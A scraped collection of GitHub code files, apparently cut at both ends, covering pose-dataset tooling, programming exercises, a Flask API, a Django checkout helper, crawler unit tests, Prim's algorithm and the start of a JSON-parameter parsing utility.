spu.sorted_recursive_glob(f'{VCLITI_ROOT}/triang/**/*.pkl')\n triang_paths = triang_paths_all[i_task:(i_task + 1)]\n\n preds_all = spu.load_pickle(f'{VCLITI_ROOT}/metrabs_pred.pkl')\n\n examples = []\n\n with spu.ThrottledPool() as pool:\n for triang_path in triang_paths:\n triang_relpath = osp.relpath(triang_path, f'{VCLITI_ROOT}/triang')\n data = spu.load_pickle(triang_path)\n triangs = temporal_median(data['triangs'])\n indices_per_cam = data['indices_per_cam']\n\n seq_relpath = osp.dirname(triang_relpath)\n seq_path = f'{VCLITI_ROOT}/{seq_relpath}'\n print(seq_path)\n cam_ids = [d[-1] for d in spu.sorted_recursive_glob(f'{seq_path}/D?')]\n cameras = [load_camera(seq_relpath, cam_id)[0] for cam_id in cam_ids]\n print(cam_ids)\n frame_paths_per_cam = [\n spu.sorted_recursive_glob(f'{seq_path}/D{cam_id}/*.jpg')\n for cam_id in cam_ids]\n boxes_per_cam = [\n [[b for b in preds_all[osp.relpath(path, VCLITI_ROOT)]['boxes'] if b[-1] > 0.5]\n for path in frame_paths]\n for frame_paths in frame_paths_per_cam]\n\n print([len(x) for x in boxes_per_cam])\n print([max(x) for x in indices_per_cam])\n print([len(x) for x in frame_paths_per_cam])\n boxes_corresp_per_cam = [\n [boxes[i] for i in indices]\n for boxes, indices in zip(boxes_per_cam, indices_per_cam)]\n frame_paths_corresp_per_cam = [\n [frame_paths[i] for i in indices]\n for frame_paths, indices in zip(frame_paths_per_cam, indices_per_cam)]\n\n for frame_paths, boxes_per_frame, camera in zip(\n frame_paths_corresp_per_cam, boxes_corresp_per_cam, cameras):\n pose_sampler = AdaptivePoseSampler2(100, True, True, 100)\n for i_frame, (frame_path, triang, boxes) in enumerate(\n zip(frame_paths, spu.progressbar(triangs), boxes_per_frame)):\n\n if not np.all(geom3d.are_bones_plausible(\n triang, ref_bone_len, joint_info_base,\n relsmall_thresh=0.3, relbig_thresh=1.5, absbig_thresh=150)):\n continue\n\n box = get_box(triang, boxes, camera)\n n_joints_valid = np.count_nonzero(camera.is_visible(triang, [1920, 1080]))\n if (n_joints_valid < 122 // 4 or\n box is None or\n 
pose_sampler.should_skip(triang)):\n continue\n\n relpath_to_ds = osp.relpath(frame_path, VCLITI_ROOT)\n new_image_replath = f'vcliti_downscaled/{relpath_to_ds}'\n ex = ds3d.Pose3DExample(\n osp.relpath(frame_path, DATA_ROOT),\n triang[i_selected_joints], bbox=box, camera=camera)\n pool.apply_async(\n make_efficient_example, (ex, new_image_replath),\n kwargs=dict(horizontal_flip=True),\n callback=examples.append)\n\n examples.sort(key=lambda ex: ex.image_path)\n ds_partial = ds3d.Pose3DDataset(joint_info, examples)\n spu.dump_pickle(ds_partial, out_path)\n\n\n@spu.picklecache('vcliti.pkl', min_time=\"2022-01-23T00:32:36\")\ndef make_dataset():\n partial_paths = spu.sorted_recursive_glob(\n f'{DATA_ROOT}/vcliti_downscaled/tasks/task_result_*.pkl')\n partial_dss = [spu.load_pickle(p) for p in partial_paths]\n main_ds = partial_dss[0]\n for ds in partial_dss[1:]:\n main_ds.examples[0].extend(ds.examples[0])\n ds3d.filter_dataset_by_plausibility(\n main_ds, relsmall_thresh=0.5, relbig_thresh=1.25, absbig_thresh=80)\n ds3d.add_masks(\n main_ds, f'{DATA_ROOT}/vcliti_downscaled/masks',\n relative_root=f'{DATA_ROOT}/vcliti_downscaled')\n return main_ds\n\n\ndef get_box(pose, boxes, camera):\n imcoords = camera.world_to_image(pose)\n gt_box = boxlib.expand(boxlib.bb_of_points(imcoords), 1.02)\n if len(boxes) == 0:\n return None\n\n i_det = np.argmax([boxlib.iou(gt_box, det[:4]) for det in boxes])\n box = boxes[i_det][:4]\n if boxlib.iou(gt_box, box) < 0.1:\n return gt_box\n return boxlib.box_hull(box, gt_box)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"isarandi/PosePile","sub_path":"posepile/ds/experimental/vcliti/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"99"} +{"seq_id":"15799844112","text":"# 2628. 
종이자르기\n\n\ndef find_max_area(col, row, cut_list):\n # 잘라지는 가로, 세로 선을 담는 리스트\n row_list = [0, row]\n col_list = [0, col]\n\n # 잘라지는 가로, 세로 선을 리스트에 담음\n for cut in cut_list:\n if cut[0] == 0:\n row_list.append(cut[1])\n else:\n col_list.append(cut[1])\n\n # 잘릴 가로, 세로 선을 오름차순으로 정렬\n row_list.sort()\n col_list.sort()\n\n area = 0\n max_area = 0\n\n # 이중 for문을 돌며 각 잘린 종이의 크기를 재고 최댓값을 구함\n for i in range(len(row_list)-1):\n for j in range(len(col_list)-1):\n area = (row_list[i+1] - row_list[i]) * (col_list[j+1] - col_list[j])\n if area > max_area:\n max_area = area\n\n return max_area\n\n\n# 종이의 가로, 세로 길이\nn, m = map(int, input().split())\n\n# 자를 번호들을 리스트로 만든 후 리스트에 담음\ncut_no = int(input())\nmy_cut_list = []\nfor i in range(cut_no):\n my_cut_list.append(list(map(int, input().split())))\n\nprint(find_max_area(n, m, my_cut_list))\n","repo_name":"alexuhn/algorithm-practice","sub_path":"BOJ/2628.py","file_name":"2628.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"828272514","text":"import json\nimport random\n\nimport numpy as np\nimport requests\nfrom flask import Flask, request, Response\n\nfrom agents import Collector\nfrom ai_model import label_image\nfrom Scraper.WebScraper import WebScraper\n\napp = Flask(__name__)\n\n@app.route('/call-tensor-flow', methods=[\"POST\"])\ndef getConfidence():\n filename = request.json[\"filename\"]\n tfData = label_image.image_predict(filename)\n newTf = []\n for x in tfData:\n prettyData = {}\n prettyData[\"name\"] = x[\"name\"].title()\n prettyData[\"confidence\"] = x[\"confidence\"]\n newTf.append(prettyData)\n out = json.dumps(newTf)\n return Response(out, mimetype='application/json')\n\n@app.route('/recommend', methods=[\"POST\"])\ndef getRecommendations():\n carName = request.json[\"carname\"]\n collector = Collector.Collector(carName)\n out =json.dumps(collector.collect(carName))\n return Response(out, mimetype='application/json')\n","repo_name":"parkerkary/FiixHackathonTeamFive","sub_path":"python/Controller/RestController.py","file_name":"RestController.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"12485562364","text":"# Créé par t.hausmann, le 15/09/2022 en Python 3.7\r\n\r\nL=12\r\n'''\r\nAuteur : Tom Hausmann\r\nDate: 15/09/2022\r\nBut : Calculer la surface et le périmètre d'un quadrilatère\r\nInputs : longueur et largeur\r\nSorties ; perimetre et surface\r\n'''\r\n\r\nl=7\r\nperimetre=(L+1)*2\r\nsurface = L*l\r\nprint(\"perimetre =\" + str(perimetre))\r\nprint(\"surface =\" + str(surface))","repo_name":"Sphax5117/PythonProjects","sub_path":"Lycée/périmetre.py","file_name":"périmetre.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"39433296389","text":"from users.models import Address,Cart, CartItem \nfrom owner.models import Delivery\nfrom django.http import HttpResponse\n\n\ndef get_cart_object(instance):\n user_obj = instance.user\n cart_obj= Cart.objects.get(user=user_obj)\n return cart_obj\n \ndef calculate_delivery_charge(instance):\n distance = instance.address.distance\n delivery_obj= Delivery.objects.get(id=1)\n if distance>delivery_obj.max_radius:\n return None\n if distance<=delivery_obj.a1:\n return delivery_obj.c1\n if distance<=delivery_obj.a2:\n return delivery_obj.c2\n if distance<=delivery_obj.a3:\n return 
delivery_obj.c3\n return distance\n\ndef calculate_tax(instance):\n user_obj = instance.user\n cart_obj= Cart.objects.get(user=user_obj)\n delivery_obj= Delivery.objects.get(id=1)\n tax_percentage=delivery_obj.tax\n tot_cart_amt=cart_obj.total_price\n tax=(tax_percentage/100)*tot_cart_amt\n return tax\n\n","repo_name":"adithyaanilkumar/deliveryt","sub_path":"server/orders/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"5859000161","text":"# lambda - alternative shorter writing of a function\n# def add_nums(a,b):\n# return a + b\n# result = add_nums(5,10)\n# print(result)\n# result = lambda a, b: a + b\n# print(result(10,20))\n\n###################################################################\n\n# map() - ФУНКЦИЯ ВЫСШЕГО ПОРЯДКА ДЛЯ ПРИМЕНЕНИЯ ФУНКЦИИ КАЖДОМУ ЭЛЕМЕНТУ В ИТЕРИРУЕМОМ ТИПЕ\n# lst = [1, 2, 3, 4, 5]\n# result = list(map(lambda x: str(x), lst))\n# def do_str(x):\n# return str(x)\n# result = list(map(do_str, lst))\n# print(result)\n\n###################################################################\n\n# filter()\n# lst = [1,2,3,4,5,6,7,8,9,10]\n# result = list(filter(lambda x: x > 5, lst))\n# def filter_this(x):\n# return x > 5\n# result = list(filter(filter_this, lst))\n# print(result)\n# !!! функция должна принимать и возвращать только один элемент\n\n###################################################################\n\n# reduce() - возвращает только одно значение\n# from functools import reduce\n# lst = [1,2,3,4,5]\n# result = reduce(lambda x, y: x + y, lst)\n# def summ_this(x,y):\n# return x + y\n# result = reduce(summ_this, lst)\n# print(result)\n\n####################################################################\n\n# zip() - возвращает список из кортежей\nemployee_numbers = [2,9,18,28]\nemployee_names = ['Helen', 'Sam', 'Jessica', 'James']\nemployee_spheres = ['IT', 'Broker', 'Cook', 'Banker']\nzipped_values = zip(employee_numbers, employee_names, employee_spheres)\nzipped_list = list(zipped_values)\nprint(zipped_list) \n\n####################################################################\n\n# lst = [1,2,3,4,5,6,7,8,9,10]\n# result = list(map(lambda x: 'even' if x % 2 == 0 else 'odd', lst))\n# def nums(x):\n# return 'even' if x % 2 == 0 else 'odd'\n# result = list(map(nums, lst))\n# print(result)\n\n####################################################################\n\n# CRUD - create, read, update, delete\n#{'Tom': 'pass123'}\n# dct = {}\n# def manager():\n# choice = input('Enter what action do you want to do (c,r,u,d): ')\n# if choice == 'c':\n# create()\n# elif choice == 'r':\n# read()\n# elif choice == 'u':\n# update()\n# elif choice == 'd':\n# delete()\n# else:\n# print('Enter c, r, u or d!')\n\n# def create():\n# global dct\n# name = input('Enter your name: ')\n# password = input('Enter your password: ')\n# dct[name] = password\n# print(f'Successfully created: {dct}.')\n# manager()\n\n# def read():\n# print(f'Users list: {dct.keys()}.')\n# manager()\n\n# def update():\n# global dct\n# name = input('Enter your name: ')\n# if name in dct.keys():\n# new_password = input('Enter your new password: ')\n# dct[name] = new_password\n# print(f'Successfully changed {name}.')\n# else:\n# print('User not found. 
Register!')\n# create()\n# manager()\n\n# def delete():\n# global dct\n# name = input('Enter your name: ')\n# old_password = input('Enter your old password: ')\n# if old_password == dct[name]:\n# dct.remove(name)\n# else:\n# print('Incorrect password.')\n# manager()\n\n# manager()\n\n# rafael = [1, 0, 3]\n# novak = [2, 2, 1]\n# scores = zip(rafael,novak)\n# def winneris(lst, name1, name2):\n# s1 = 0\n# s2 = 0\n# for score1, score2 in (lst):\n# if score1 > score2:\n# s1 += 1\n# elif score2 > score1:\n# s2 += 1\n# dct2 = {name1: s1, name2: s2}\n# for k, v in dct2.items():\n# if v == max(dct2.values()):\n# winner = k\n# print(f'The winner of the game is {winner} with final score {max(dct2.values())}:{min(dct2.values())}.')\n\n \n# winneris(scores, 'rafael', 'novak')\n\n","repo_name":"jamalsamatova/evening_bootcamp","sub_path":"week4/day18/higher_order_functions.py","file_name":"higher_order_functions.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"26097080724","text":"from typing import List\nfrom player.index import PlayerGameSim, pos_dict\nfrom player.position import Position\n\ndef sort_team(players: List[PlayerGameSim], depth: int) -> List[PlayerGameSim]:\n sorted_list = []\n for i in range(1, 6):\n player_set = set(players) - set(sorted_list)\n sorted_list.append(get_best_at_position(i, player_set))\n \n for i in range(1, depth-4):\n player_set = set(players) - set(sorted_list)\n sorted_list.append(get_best_at_position(i, player_set))\n\n return sorted_list\n\ndef get_pos_depths(pos: Position, l: List[PlayerGameSim] = list()) -> int:\n if l == []:\n return 0\n depth = 0\n for player in l:\n if player._pos in pos_dict[pos.value]:\n depth += 1\n return depth\n\ndef get_best_at_position(i: int, pool: List, sub: bool = False) -> PlayerGameSim:\n if len(pool) == 0:\n return None\n \n # first filter out injured players\n pool = [p for p in pool if not p._injured]\n\n # sub = True (for subs) or False (for starters)\n if sub:\n pool = [p for p in pool if p.stat('bench_time') > 0]\n best = sorted(pool, key= lambda p: p.ovr(i), reverse=True)[0]\n if best.ovr(i) == -1:\n return None\n return best\n","repo_name":"okonma01/make-or-miss","sub_path":"team/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"2308840378","text":"# -*- coding: utf-8 -*-\nfrom pathlib import Path\nimport pytest\nimport json\nimport os\nimport sys\nimport time\nimport shutil\n\n# Make sure the files in test parent directory are in path and can be imported\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\nimport utils as u\nimport constants as c\n\n#######\n# TESTS\n#######\n\n\ndef test_get_root_url():\n \"\"\"Test that get_root_url returns the root url of a given url.\"\"\"\n assert u.get_root_url(\"https://www.schlieren.ch\") == \"https://www.schlieren.ch\"\n assert u.get_root_url(\"http://www.schlieren.ch\") == \"http://www.schlieren.ch\"\n assert u.get_root_url(\"https://www.schlieren.ch/\") == \"https://www.schlieren.ch\"\n assert (\n u.get_root_url(\"https://www.schlieren.ch/politbusiness\")\n == \"https://www.schlieren.ch\"\n )\n assert (\n u.get_root_url(\"https://www.schlieren.ch/politbusiness/\")\n == \"https://www.schlieren.ch\"\n )\n assert (\n u.get_root_url(\"https://www.schlieren.ch/politbusiness/1086122\")\n == \"https://www.schlieren.ch\"\n )\n 
assert (\n u.get_root_url(\"https://realpython.com/pytest-python-testing/\")\n == \"https://realpython.com\"\n )\n assert (\n u.get_root_url(\"https://realpython.com/pytest-python-testing\")\n == \"https://realpython.com\"\n )\n\n\ndef test_get_id_from_url():\n \"\"\"Test that get_id_from_url returns the id from a given url.\"\"\"\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/politbusiness/1086122\") == \"1086122\"\n )\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/_rte/information/1111945\")\n == \"1111945\"\n )\n assert u.get_id_from_url(\"https://www.schlieren.ch/_doc/2894047\") == \"2894047\"\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/politbusiness/1086122/\")\n == \"1086122\"\n )\n assert (\n u.get_id_from_url(\"https://www.schlieren.ch/_rte/information/1111945/\")\n == \"1111945\"\n )\n assert u.get_id_from_url(\"https://www.schlieren.ch/_doc/2894047/\") == \"2894047\"\n\n\ndef test_read_json(item_dict):\n \"\"\"Test that read_json reads a json file from the given path.\"\"\"\n json_path = c.JSON_DIR / f\"{item_dict['item_id']}.json\"\n json_path.write_text(json.dumps(item_dict))\n assert u.read_json(json_path) == item_dict\n\n\ndef test_write_json(item_dict):\n \"\"\"Test that write_json writes a json file to the given path.\"\"\"\n json_path = c.JSON_DIR / f\"{item_dict['item_id']}.json\"\n u.write_json(item_dict, json_path)\n assert os.path.isfile(json_path)\n with open(json_path) as f:\n assert json.load(f) == item_dict\n\n\ndef test_load_ok_item_or_none(item_dict_raw):\n \"\"\"Test that load_ok_item_or_none returns the item_dict if the\n item status is OK and otherwise None.\"\"\"\n\n # non-existing item should return None\n assert u.load_ok_item_or_none(item_dict_raw) is None\n\n # existing item with status OK should return item_dict\n json_path = c.JSON_DIR / f\"{item_dict_raw['item_id']}.json\"\n item_dict_raw[\"status\"] = \"OK\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) == item_dict_raw\n\n # Existing item with status other than OK should return None:\n # Status ERROR should return None\n item_dict_raw[\"status\"] = \"ERROR\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n item_dict_raw[\"status\"] = \"SOMETHING_ELSE\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n # Empty string status should return None\n item_dict_raw[\"status\"] = \"\"\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n # None status should return None\n item_dict_raw[\"status\"] = None\n u.write_json(item_dict_raw, json_path)\n assert u.load_ok_item_or_none(item_dict_raw) is None\n\n\ndef test_with_retry():\n \"\"\"Test that with_retry decorator retries a function call a given number of times.\"\"\"\n\n def function_that_returns_value():\n nonlocal attempts\n attempts += 1\n return 42\n\n def function_that_raises_exception():\n nonlocal attempts\n attempts += 1\n raise Exception(\"Test exception\")\n\n def function_that_returns_value_on_second_attempt():\n nonlocal attempts\n attempts += 1\n if attempts == 1:\n raise Exception(\"Test exception\")\n return 42\n\n # A function that returns a value should return the value in first attempt\n attempts = 0\n f = u.with_retry(max_retries=3, retry_wait=0.1)(function_that_returns_value)\n assert f() == 42\n assert attempts == 1\n # A function that always raises exception should fail after (1 + max_retries) attempts\n attempts = 0\n 
time_start = time.time()\n f = u.with_retry(max_retries=3, retry_wait=0.05)(function_that_raises_exception)\n with pytest.raises(Exception, match=r\"Fetching failed after 3 retries .*\"):\n f()\n assert attempts == 4\n assert 0.1 < (time.time() - time_start) < 0.2\n # Similar to above, but different decorator args\n attempts = 0\n time_start = time.time()\n f = u.with_retry(max_retries=2, retry_wait=0.01)(function_that_raises_exception)\n with pytest.raises(Exception, match=r\"Fetching failed after 2 retries .*\"):\n f()\n assert attempts == 3\n assert 0.01 < (time.time() - time_start) < 0.03\n # A function that returns on second attempt, should return the value in second attempt\n attempts = 0\n time_start = time.time()\n f = u.with_retry(max_retries=5, retry_wait=0.05)(\n function_that_returns_value_on_second_attempt\n )\n assert f() == 42\n assert attempts == 2\n assert 0.01 < (time.time() - time_start) < 0.1\n\n\ndef test_fetch_items_from_table(monkeypatch, table_html, item_dict_raw):\n \"\"\"Test that fetch_items_from_table returns a list of items from a table html string.\"\"\"\n monkeypatch.setattr(\"utils.fetch_html\", lambda _: table_html)\n items_raw = u.fetch_items_from_table(\"https://www.schlieren.ch/politbusiness\")\n items_raw_filtered = [\n i for i in items_raw if i[\"item_id\"] == item_dict_raw[\"item_id\"]\n ]\n assert len(items_raw_filtered) == 1\n assert items_raw_filtered[0] == item_dict_raw\n\n\ndef test_read_pdf_text():\n \"\"\"Test that read_pdf_text returns the text from a well known test pdf file.\"\"\"\n test_pdf_path = (\n Path(os.path.dirname(os.path.abspath(__file__))) / \"test_assets\" / \"test.pdf\"\n )\n assert u.read_pdf_text(test_pdf_path) == \"hello there, beautiful\"\n\n\ndef test_clean_text():\n \"\"\"Test that clean_text returns a text with duplicate whitespaces, tab and newline removed.\"\"\"\n assert u.clean_text(\"Hello there, beautiful\") == \"Hello there, beautiful\"\n assert u.clean_text(\" Hello there, beautiful \") == \"Hello there, beautiful\"\n assert u.clean_text(\"Hello there, beautiful\\n\\r\") == \"Hello there, beautiful\"\n assert u.clean_text(\"Hello there, beautiful\\t\") == \"Hello there, beautiful\"\n assert (\n u.clean_text(\n \"\"\"\n Hello there,\n beautiful\n \"\"\"\n )\n == \"Hello there, beautiful\"\n )\n\n\ndef test_summarize_text(monkeypatch):\n \"\"\"Test that summarize_text returns a summary of a given text.\"\"\"\n # We do not want to call openai API, so mock chatgpt summary.\n monkeypatch.setattr(\"utils.generate_openai_summary\", lambda _: \"Awesome summary\")\n # When openai key is missing we expect an exception\n monkeypatch.setenv(\"OPENAI_KEY\", \"\")\n with pytest.raises(Exception, match=r\"Openai api key must be available .*\"):\n u.summarize_text(\"Dummy text\")\n # With openai key summary works\n monkeypatch.setenv(\"OPENAI_KEY\", \"Hemingway\")\n assert u.summarize_text(\"Dummy text\") == \"Awesome summary\"\n # Assume generate_openai_summary fails, make sure it is retried max_attempts times.\n # Monkeypatch also time.sleep function to not block tests for long time.\n monkeypatch.setattr(\"utils.generate_openai_summary\", lambda _: 1 / 0)\n monkeypatch.setattr(\"time.sleep\", lambda _: None)\n with pytest.raises(\n Exception, match=r\"Failed to summarize text after 4 attempts!.*\"\n ):\n u.summarize_text(\"Dummy text\", max_attempts=4)\n\n\ndef test_create_pdf_summary(monkeypatch, item_dict):\n \"\"\"\n Test that create_pdf_summary returns a summary of a given pdf file\n and that assertions work to avoid 
returning empty text and summary.\n \"\"\"\n # Monkeypatch: Instead of downloading the pdf, copy test pdf in temporary directory.\n def mock_download_and_write_pdf(*args, **kwargs):\n \"\"\"Just copy test.pdf to temp dir.\"\"\"\n test_pdf_path = (\n Path(os.path.dirname(os.path.abspath(__file__)))\n / \"test_assets\"\n / \"test.pdf\"\n )\n shutil.copy(test_pdf_path, c.TEMP_DIR / f\"{item_dict['pdf_id']}.pdf\")\n\n monkeypatch.setattr(\"utils.download_and_write_pdf\", mock_download_and_write_pdf)\n\n # Monkeypatch: Skip OCR calls in this test to speed up test.\n monkeypatch.setattr(\"os.system\", lambda _: None)\n\n pdf_url = item_dict[\"pdf_url\"]\n pdf_temp_path = c.TEMP_DIR / f\"{item_dict['pdf_id']}.pdf\"\n\n # When all goes well, we expect a summary (monkeypatched to be identical with test pdf content) and no pdf in the temp dir.\n monkeypatch.setattr(\"utils.summarize_text\", lambda text: text)\n summary = u.create_pdf_summary(pdf_url)\n assert summary == \"hello there, beautiful\"\n assert os.path.isfile(pdf_temp_path) == False\n\n # When empty string is returned for summarization, we except an exception\n # to be raised with appropriate error message and no pdf in the temp dir.\n monkeypatch.setattr(\"utils.summarize_text\", lambda _: \"\")\n with pytest.raises(Exception, match=r\".*PDF summary was empty!.*\"):\n u.create_pdf_summary(pdf_url)\n assert os.path.isfile(pdf_temp_path) == False\n\n # When empty string is returned for reading pdf, we except an exception\n # to be raised with appropriate error message and no pdf in the temp dir.\n monkeypatch.setattr(\"utils.read_pdf_text\", lambda _: \"\")\n with pytest.raises(Exception, match=r\".*PDF text was empty!.*\"):\n u.create_pdf_summary(pdf_url)\n assert os.path.isfile(pdf_temp_path) == False\n\n\ndef test_process_item(monkeypatch, item_detail_page_html, item_dict_raw, item_dict):\n \"\"\"Test that process_item returns a processed item dict.\"\"\"\n monkeypatch.setattr(\"utils.fetch_html\", lambda _: item_detail_page_html)\n monkeypatch.setattr(\"utils.create_pdf_summary\", lambda _: \"Awesome summary\")\n\n item = u.process_item(item_dict_raw)\n assert item == item_dict\n\n\ndef test_add_response_links():\n items = [\n {\"item_id\": \"112358\", \"title\": \"Inquery about something\", \"related_items\": []},\n {\n \"item_id\": \"667430\",\n \"title\": \"Response to inquery about something\",\n \"related_items\": [],\n },\n {\n \"item_id\": \"602214\",\n \"title\": \"Totally different inquery\",\n \"related_items\": [],\n },\n ]\n u.add_response_links(items)\n # - We expect that the first item's title and id were added to second item's related_items array and vice versa.\n # - We expect that the third item's related_items array is empty.\n assert len(items[0][\"related_items\"]) == 1\n assert len(items[1][\"related_items\"]) == 1\n assert len(items[2][\"related_items\"]) == 0\n assert items[0][\"related_items\"][0] == {\n \"item_id\": items[1][\"item_id\"],\n \"title\": items[1][\"title\"],\n }\n assert items[1][\"related_items\"][0] == {\n \"item_id\": items[0][\"item_id\"],\n \"title\": items[0][\"title\"],\n }\n\n\ndef test_crawl_and_summarize(monkeypatch, item_dict_raw, item_dict):\n \"\"\"Test that crawl_and_summarize fetches items from the table and processes them.\"\"\"\n\n # If the item does NOT exist in the json dir, we expect it to be fetched and processed.\n monkeypatch.setattr(\"utils.fetch_items_from_table\", lambda _: [item_dict_raw])\n monkeypatch.setattr(\"utils.load_ok_item_or_none\", lambda _: None)\n 
monkeypatch.setattr(\"utils.process_item\", lambda _: item_dict)\n items = u.crawl_and_summarize(\"https://www.dummy_url_table.com\")\n assert len(items) == 1\n assert items[0] == item_dict\n\n # If the item DOES exist in the json dir, we expect it to be loaded and\n # process_item never being called. Test this by raising exception if process_item is called.\n monkeypatch.setattr(\"utils.load_ok_item_or_none\", lambda _: item_dict)\n monkeypatch.setattr(\"utils.process_item\", lambda _: 1 / 0)\n items = u.crawl_and_summarize(\"https://www.dummy_url_table.com\")\n assert len(items) == 1\n assert items[0] == item_dict\n","repo_name":"laiskasiili/crawl-n-summarize-parliament-schlieren","sub_path":"app/tests/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":12737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"1505840451","text":"import sys\nimport itertools\n\ndef setupDictionary(filepath) :\n fileName = filepath\n file = open(fileName,\"r\")\n words = file.readlines()\n file.close()\n upperWords = list()\n for word in words :\n upperWords.append(word.lower().strip('\\n'))\n return upperWords\n\ndictionary = setupDictionary(\"words.txt\")\n#dictionary\n\ntotal_words = setupDictionary(\"unixWords.txt\")\n#total_words\n\na_set = set(total_words)\n#a_set\n\nfor word in dictionary:\n print(word)\n ang = []\n ang = [\"\".join(perm) for perm in itertools.permutations(word)]\n ang.remove(word)\n #print(ana)\n b_set = set(ang)\n #print(a_set)\n #print(b_set)\n if (a_set & b_set):\n anagrams = (a_set & b_set)\n print(anagrams)\n else:\n print(\"No anagram elements found in words text file.\")\n\n","repo_name":"Amey23/CodeKata","sub_path":"Kata06 Anagrams/kata06_anagrams.py","file_name":"kata06_anagrams.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37118613214","text":"import numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt \n\n\n# zad 3.5 \ndef get_min_spanning_tree(G): # algorytm prima\n visited_nodes = [list(G)[0]]\n spanning_edges = []\n while len(visited_nodes) != G.number_of_nodes():\n\n u,v = -1,-1\n edge_weight = np.inf\n for node in visited_nodes:\n for neighbor in G.neighbors(node):\n if neighbor not in visited_nodes and G.get_edge_data(node,neighbor)['weight'] < edge_weight:\n u,v = node,neighbor\n edge_weight = G.get_edge_data(u,v)['weight']\n \n visited_nodes.append(v)\n spanning_edges.append((u,v,{'weight' :edge_weight}))\n\n return spanning_edges\n\ndef visualise_spanning_tree(G,spanning_tree):\n plt.figure(figsize=[10.6,7.2])\n\n plt.subplot(1,2,1)\n nx.draw_circular(G,with_labels=True)\n nx.draw_networkx_edge_labels(G,pos=nx.circular_layout(G),edge_labels=nx.get_edge_attributes(G,'weight'))\n\n G = nx.create_empty_copy(G)\n for edge in spanning_tree:\n G.add_edge(edge[0],edge[1])\n G[edge[0]][edge[1]]['weight'] = edge[2]['weight']\n\n plt.subplot(1,2,2) \n nx.draw_circular(G,with_labels=True)\n nx.draw_networkx_edge_labels(G,pos=nx.circular_layout(G),edge_labels=nx.get_edge_attributes(G,'weight'))\n\n\n\n\n\n# def prim_algorithm(graph):\n \n# mst_vertices = []\n# min_edge_weights = {}\n# parents = {}\n \n# for i in range(len(graph)):\n# min_edge_weights[i] = float('inf')\n# parents[i] = None\n \n# min_edge_weights[0] = 0\n \n# while len(mst_vertices) < len(graph):\n# min_weight_vertex = None\n# for i in range(len(graph)):\n# if i not in mst_vertices:\n# if 
min_weight_vertex is None or min_edge_weights[i] < min_edge_weights[min_weight_vertex]:\n# min_weight_vertex = i\n \n# mst_vertices.append(min_weight_vertex)\n \n# for i in range(len(graph)):\n# if graph[min_weight_vertex][i] != 0 and i not in mst_vertices:\n# if graph[min_weight_vertex][i] < min_edge_weights[i]:\n# min_edge_weights[i] = graph[min_weight_vertex][i]\n# parents[i] = min_weight_vertex\n \n\n# mst_edges = []\n# total_weight = 0\n \n# for i in range(1, len(graph)):\n# mst_edges.append((parents[i], i))\n# total_weight += graph[parents[i]][i]\n \n# return mst_edges, total_weight","repo_name":"albusDalbador/graph_theory_labs","sub_path":"lab3/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"17911857268","text":"##ss\nclass Solution:\n def maxSubsequence(self, nums: List[int], k: int) -> List[int]:\n \n ##each element will either be considered or not considered\n ##basically find largest k elements and return ans\n ##can also used heap to make it asymptotically faster\n ans = []\n \n for x in range(len(nums)):\n if len(ans) < k:\n ans.append(nums[x])\n \n else:\n if min(ans) < nums[x]:\n ans.append(nums[x])\n ans.remove(min(ans))\n \n return ans\n \n","repo_name":"midnightbot/leetcode_solutions","sub_path":"python3_solution_set0/2099. Find Subsequence of Length K With the Largest Sum.py","file_name":"2099. Find Subsequence of Length K With the Largest Sum.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"99"} +{"seq_id":"43016110101","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# project = https://github.com/fanxs-t/Shadow-Border\n# author = Fanxs\n\n\nimport json\nfrom treelib import Tree, Node\n\n'''\n Designed for parse json string, especially for the case where there are jsons in a json body.\n Example:\n post_data = '{\"test\": \"123\", \"test1\": {\"test2\": \"456\"}}'\n ob = JsonParser(post_data)\n print(ob[\"test\"], ob[\"test1\"], ob[\"test2\"])\n ob2 = ob.copy()\n ob2[\"test2\"] = payload\n requests.request(\"POST\", \"https://www.baidu.com\", json = ob2.json)\n \n Only the data of leaf nodes are allowed for data modification, the \"test\" and \"test2\" in this case.\n - JsonParser(string).json returns parse dictionary (which can be used for making requests with 'requests')\n - JsonParser(string).args returns all arguments allowed for data manipulation.\n - JsonParser(string).copy to copy this 